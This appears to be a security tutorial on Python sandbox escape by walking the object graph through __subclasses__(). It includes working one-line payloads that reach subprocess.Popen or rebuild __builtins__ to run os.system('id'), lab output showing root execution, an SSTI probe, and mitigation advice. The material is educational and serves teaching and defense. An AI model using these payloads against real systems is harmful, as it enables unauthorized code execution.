Walking the Python Object Graph with __subclasses__()

Almost every Python sandbox escape, pickle gadget, and template-injection RCE you will ever write ends in the same place: walking from some harmless object up to the base object type, enumerating its subclasses, and finding one that hands you code execution. This page documents that chain as a standalone primitive, because once you understand it you stop memorizing payloads and start deriving them on the spot for whatever objects a given jail leaves you.

The technique exists because of two facts about CPython’s object model. First, every class ultimately inherits from object, and every class keeps a list of weak references to its live direct subclasses, reachable through __subclasses__(). Second, that registry is process-wide: object.__subclasses__() lists every class in the interpreter that derives directly from object, not just the ones the target code imported, and deeper descendants are one more __subclasses__() call away. If subprocess has been imported anywhere in the process, subprocess.Popen is sitting in that list waiting to be called, whether or not the code you are attacking ever referenced it.
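
The scope of the registry is easy to check for yourself. The sketch below defines two throwaway classes (Marker and Child are hypothetical names, introduced only for this illustration) and shows that __subclasses__() reports direct subclasses, so a grandchild of object is listed on its parent rather than on object itself:

```python
# Marker and Child are hypothetical classes, defined only to observe the registry.
class Marker:
    pass

class Child(Marker):
    pass

direct = object.__subclasses__()

print(Marker in direct)                    # True: derives directly from object
print(Child in direct)                     # False: a grandchild is not listed on object
print(Child in Marker.__subclasses__())    # True: it is listed on its immediate parent

# The same holds for builtins: bool derives from int, not directly from object.
print(bool in direct, bool in int.__subclasses__())   # False True
```

Popen and catch_warnings both derive directly from object, which is why the one-level enumeration used on this page is enough to find them.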

Climbing to object

You can start from any object literal (an empty string, an empty list, a tuple, an integer) and reach the root of the type hierarchy. The steps are __class__ to get the type, then __mro__ (method resolution order) or __base__ to climb to object:

>>> ''.__class__
<class 'str'>
>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)
>>> ''.__class__.__mro__[-1]
<class 'object'>
>>> ().__class__.__base__          # the shorter, equivalent path
<class 'object'>

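__mro__[-1] is always object. __base__ walks up one level at a time, so it lands on object in a single hop only for types that derive from it directly (str, list, tuple, int); for deeper types such as bool, repeat __base__ until you get there. This matters in restricted environments: when a filter blocks one attribute name but not the other, you usually still have several equivalent routes up the graph.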
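
As a minimal sketch of the two routes, the helpers below (root_via_mro and root_via_base are illustrative names, not part of any library) climb from an arbitrary object to the root and check that both paths agree for a handful of starting points:

```python
def root_via_mro(obj):
    """Jump straight to the root: the last MRO entry is always object."""
    return obj.__class__.__mro__[-1]

def root_via_base(obj):
    """Follow __base__ upward until it runs out (object.__base__ is None)."""
    cls = obj.__class__
    while cls.__base__ is not None:
        cls = cls.__base__
    return cls

# Any live object works as a starting point.
samples = ['', [], (), 0, True, {}.keys()]
for s in samples:
    assert root_via_mro(s) is object
    assert root_via_base(s) is object

# bool sits two levels below object, so a single __base__ hop is not enough.
print(True.__class__.__base__)             # <class 'int'>
print(True.__class__.__base__.__base__)    # <class 'object'>
```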

Enumerating subclasses

Once you hold object, __subclasses__() returns every loaded class that derives directly from it:

>>> len(object.__subclasses__())
215
>>> ''.__class__.__mro__[-1].__subclasses__()[:5]
[<class 'type'>, <class 'async_generator'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>]

The list is long, and both its length and its order depend on what has been imported and on the CPython version, so hardcoding an index like __subclasses__()[137] is brittle. Always select by name instead. See Python Introspection for the full dump and the enumeration mechanics.

Gadget 1: subprocess.Popen by name

If subprocess is loaded, the cleanest path to a shell is to find Popen in the subclass list and instantiate it directly:

[c for c in ().__class__.__base__.__subclasses__()
 if c.__name__ == 'Popen'][0]('id', shell=True, stdout=-1).communicate()

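This filters the subclass list for the class literally named Popen, instantiates it with a command, and reads the output (stdout=-1 is the numeric value of subprocess.PIPE), all without an import subprocess statement anywhere in the payload. The same by-name selection is the workhorse for Jinja2 SSTI and PyJail challenges, although Jinja2 has no comprehension syntax, so there the filter is written as a {% for %} loop with an {% if %} test. Its only weakness is the dependency on subprocess having been imported.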
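
A harmless way to watch this gadget work is sketched below. It makes two assumptions that are not part of the payload: subprocess is imported explicitly to stand in for "something in the process already loaded it", and the command is a child Python interpreter printing a marker instead of id. The extra __module__ check is a precaution, because other modules (multiprocessing, for example) define their own class named Popen.

```python
import subprocess  # stands in for an import made elsewhere in the target process
import sys

# Same lookup as the payload, with a module check to avoid same-named classes.
popen = [c for c in ().__class__.__base__.__subclasses__()
         if c.__name__ == 'Popen' and c.__module__ == 'subprocess'][0]

print(popen is subprocess.Popen)   # True: the graph walk found the real class
print(subprocess.PIPE)             # -1, which is why stdout=-1 captures output

# Run a harmless command through the class we reached by name.
out, _ = popen([sys.executable, '-c', 'print("reached")'], stdout=-1).communicate()
print(out.strip())                 # b'reached'
```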

Gadget 2: recovering __builtins__ through any function

The more robust gadget does not depend on subprocess. Every Python-level function carries its defining module’s namespace in __globals__, and that namespace contains __builtins__, the full builtin table, including __import__. You just need to reach any function object from the subclass list.

A class that is present in practically every real process is warnings.catch_warnings (the warnings module is typically loaded during interpreter startup or by one of the first imports). Each instance stores its module in the _module attribute, from which __builtins__ is one hop away:

[c for c in ().__class__.__base__.__subclasses__()
 if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('id')

Equivalently, reach __globals__ through the __init__ of any class implemented in Python (C-level slot wrappers have no __globals__) and import os through the recovered builtins:

[c for c in ().__class__.__base__.__subclasses__()
 if c.__name__ == 'catch_warnings'][0].__init__.__globals__['__builtins__']['__import__']('os').system('id')

This is the gadget that survives a sandbox which deleted __builtins__ from the execution namespace: you are not using the namespace’s builtins, you are rebuilding them from an object you reached through the graph. That makes it the foundation of Escaping Python exec and eval Sandboxes.
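
The recovery can be reproduced safely in a few lines. This is a sketch under stated assumptions: the jail dictionary is a hypothetical stand-in for a stripped sandbox, warnings is imported explicitly so the demo does not depend on startup behaviour, and the recovered __import__ loads math rather than os.

```python
import warnings  # explicit, so the demo does not rely on what startup imported

PAYLOAD = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == 'catch_warnings'][0]"
    ".__init__.__globals__['__builtins__']"
)

jail = {'__builtins__': {}}   # hypothetical sandbox namespace with builtins removed

try:
    eval("len('abc')", jail)
except NameError as exc:
    print('inside the jail:', exc)       # name 'len' is not defined

recovered = eval(PAYLOAD, jail)
# __builtins__ is a dict in imported modules but may be a module elsewhere.
if not isinstance(recovered, dict):
    recovered = vars(recovered)

print('__import__' in recovered)                   # True
print(recovered['__import__']('math').sqrt(16.0))  # 4.0
```

The jail never held len or __import__, yet both come back through a function's __globals__, which is the whole point of the gadget.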

Why the chain is hard to kill

Defenders frequently try to block this by stripping __builtins__, blacklisting the word import, or removing dangerous names from the namespace. None of it works, because the attack never relies on the namespace it was handed. As long as the attacker can evaluate attribute access and calls on any one object, they can climb to object, enumerate the process’s loaded classes, and rebuild whatever was taken away.
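
To make that concrete, here is a sketch of a deliberately naive jail and a payload that walks past it. Everything here is hypothetical: naive_jail and BLOCKED are invented for this illustration, and the payload imports math instead of anything dangerous. The blocked words never appear in the payload because they are assembled from string fragments at evaluation time.

```python
import warnings  # explicit, so catch_warnings is guaranteed to be loaded

BLOCKED = ('import', '__builtins__', 'eval', 'exec')

def naive_jail(expr):
    """Hypothetical 'hardened' evaluator: substring blacklist plus empty builtins."""
    if any(word in expr for word in BLOCKED):
        raise ValueError('blocked keyword')
    return eval(expr, {'__builtins__': {}})

# The obvious attempt is rejected by the blacklist.
try:
    naive_jail("__import__('math').pi")
except ValueError as exc:
    print('direct attempt:', exc)

# The graph walk needs none of the blocked words spelled out.
payload = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == 'catch_warnings'][0]"
    ".__init__.__globals__['__buil' + 'tins__']['__imp' + 'ort__']('math').pi"
)
result = naive_jail(payload)
print(result)   # the value of math.pi, obtained through the "jail"
```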

The only durable mitigations operate below the language: do not pass untrusted input to an evaluator at all; if you must, run it in a separate process under OS-level confinement (seccomp, a container with a read-only filesystem and no network, gVisor). Attribute-level blacklists inside the same interpreter are a speed bump, not a boundary.
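
The process-separation half of that advice might look like the sketch below. It is deliberately incomplete: evaluate_out_of_process and WORKER are hypothetical names, and a child process on its own is not confinement, since it still runs with the parent's privileges. The seccomp profile, container, or gVisor layer has to wrap the child and is not shown here.

```python
import subprocess
import sys

# Code run by the child: read one expression from stdin, print the repr of its value.
WORKER = "import sys; print(repr(eval(sys.stdin.read(), {'__builtins__': {}})))"

def evaluate_out_of_process(expr, timeout=2.0):
    """Evaluate `expr` in a throwaway child interpreter and return its printed repr.

    This only moves evaluation out of the caller's interpreter. The child must
    additionally be confined at the OS level for this to be a boundary.
    """
    proc = subprocess.run(
        [sys.executable, '-I', '-c', WORKER],   # -I: isolated mode, ignores user site and env vars
        input=expr, capture_output=True, text=True, timeout=timeout,
    )
    if proc.returncode != 0:
        raise RuntimeError(proc.stderr.strip() or f'child exited with {proc.returncode}')
    return proc.stdout.strip()

print(evaluate_out_of_process("1 + 1"))   # 2
```

The design point is that a successful graph walk now lands in a disposable process whose objects, secrets, and loaded classes are not those of the application.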

Tested on CPython 3.12.3. The takeaway: __subclasses__() turns “I can evaluate one Python expression” into “I have every loaded class in the process”, and from there code execution is a search problem, not a privilege problem. When you audit any feature that evaluates user-controlled Python, assume this chain is available and design as if __builtins__ cannot be hidden. The runnable demonstration is generic-py-fu/object-model/subclasses-walk.py in the lab.

Running it in the lab

docker compose run --rm generic-py-fu python3 object-model/subclasses-walk.py
STEP 1: Climbing from a literal up to `object`
''.__class__.__mro__:      (<class 'str'>, <class 'object'>)
().__class__.__base__:     <class 'object'>
Both routes land on the same root: True

STEP 2: Enumerating object.__subclasses__()
Total loaded subclasses of object: 234
First 5: ['type', 'async_generator', 'bytearray_iterator', 'bytearray', 'bytes_iterator']

STEP 3 / GADGET 1: subprocess.Popen by name -> run `id`
Found Popen via the subclass list: <class 'subprocess.Popen'>
Command output: uid=0(root) gid=0(root) groups=0(root)

STEP 4 / GADGET 2: recover __builtins__ via catch_warnings -> `id`
Recovered __builtins__ through __init__.__globals__ (keys: 157 entries)
Calling __import__('os').system('id') ...
uid=0(root) gid=0(root) groups=0(root)

One evaluable expression reached every loaded class and then code execution, with no imports written and no builtins in scope.

Why object-graph walking matters from an offensive security perspective

I treat __subclasses__() as the universal solvent of Python exploitation. The moment an assessment hands me a single evaluable expression, this primitive converts that toehold into the entire set of classes loaded in the process, and from there into code execution, without me importing anything or relying on whatever names the target left in scope. It is what makes “I can evaluate one expression” and “I have RCE” the same sentence.

What an attacker prizes here is reach. The graph does not respect the boundary the developer thought they drew. A jail that deletes __builtins__, blacklists import, or scrubs dangerous names still hands me ''.__class__, and that one attribute access is enough to climb to object, enumerate every subclass, and rebuild __import__ out of any function’s __globals__. The richer the process (more imported modules, more loaded classes), the more gadgets sit waiting in the subclass list.

Where I look for the reachable sink during an assessment:

  • Template engines rendering user input. Any Jinja2/Mako/Tornado context where I control the template string is a direct expression sink; {{ ''.__class__.__mro__[-1].__subclasses__() }} is my first probe.
  • eval/exec on user data. Calculator endpoints, formula fields, rule engines, “advanced search” filters, and admin “run expression” features almost always reduce to attribute access on live objects.
  • Pickle and YAML object reconstruction. Once I have any deserialization foothold, the same graph walk lets me reach functions I was never handed (see Insecure Deserialization - Python Pickle and Insecure Deserialization - Unsafe YAML Loading).
  • Restricted REPLs and debug consoles exposed in production, where the author assumed attribute filtering was a boundary.

The audit tell is any code path where attacker input flows into expression evaluation against real objects, regardless of how many names the surrounding sandbox strips. For defenders the takeaway is blunt: attribute-level blacklists inside the interpreter are not a security boundary, so the only durable control is to never evaluate untrusted expressions against live objects in the first place.
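
A first pass over a codebase can be automated. The sketch below is a rough triage aid under stated assumptions, not a complete detector: find_evaluator_calls and the sample source are hypothetical, and it only flags direct calls by name, so aliased calls and template rendering still need manual review.

```python
import ast

EVALUATORS = {'eval', 'exec', 'compile'}

def find_evaluator_calls(source, filename='<source>'):
    """Return sorted (line, name) pairs for direct calls to a name in EVALUATORS."""
    hits = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id in EVALUATORS):
            hits.append((node.lineno, node.func.id))
    return sorted(hits)

# Hypothetical application code to scan.
sample = '''
def calc(user_formula):
    return eval(user_formula, {"__builtins__": {}})

def safe(x):
    return int(x)
'''
print(find_evaluator_calls(sample))   # [(3, 'eval')]
```

Each hit is a place to ask whether attacker-controlled text can reach the first argument; the stripped __builtins__ in the sample is exactly the false comfort this page describes.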

Mitigation

There is no fix at the object-graph level, because the climb from any object to object.__subclasses__() and on to __globals__ is intrinsic to Python’s data model; the only effective defense sits upstream, in never letting an attacker evaluate expressions against live objects in the first place. That means eliminating the eval, exec, or template-injection entry point that grants expression evaluation, and where untrusted code must run, isolating it in a separate operating-system-sandboxed process rather than attempting to prune attributes or blocklist class names inside the same interpreter.
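
Where a feature only needs literal values (numbers, strings, lists, dicts) rather than real expressions, one way to remove the entry point is the standard library's ast.literal_eval, which refuses anything that requires attribute access or a call. The wrapper below is a sketch; parse_user_value is a hypothetical name, and this option only fits features that never needed evaluation in the first place.

```python
import ast

def parse_user_value(text):
    """Accept only Python literals; anything that needs evaluation is rejected."""
    try:
        return ast.literal_eval(text)
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError):
        raise ValueError('not a plain literal') from None

print(parse_user_value("[1, 2, {'k': 3.5}]"))   # [1, 2, {'k': 3.5}]

# The first step of the graph walk is already refused.
try:
    parse_user_value("''.__class__")
except ValueError as exc:
    print('rejected:', exc)                      # rejected: not a plain literal
```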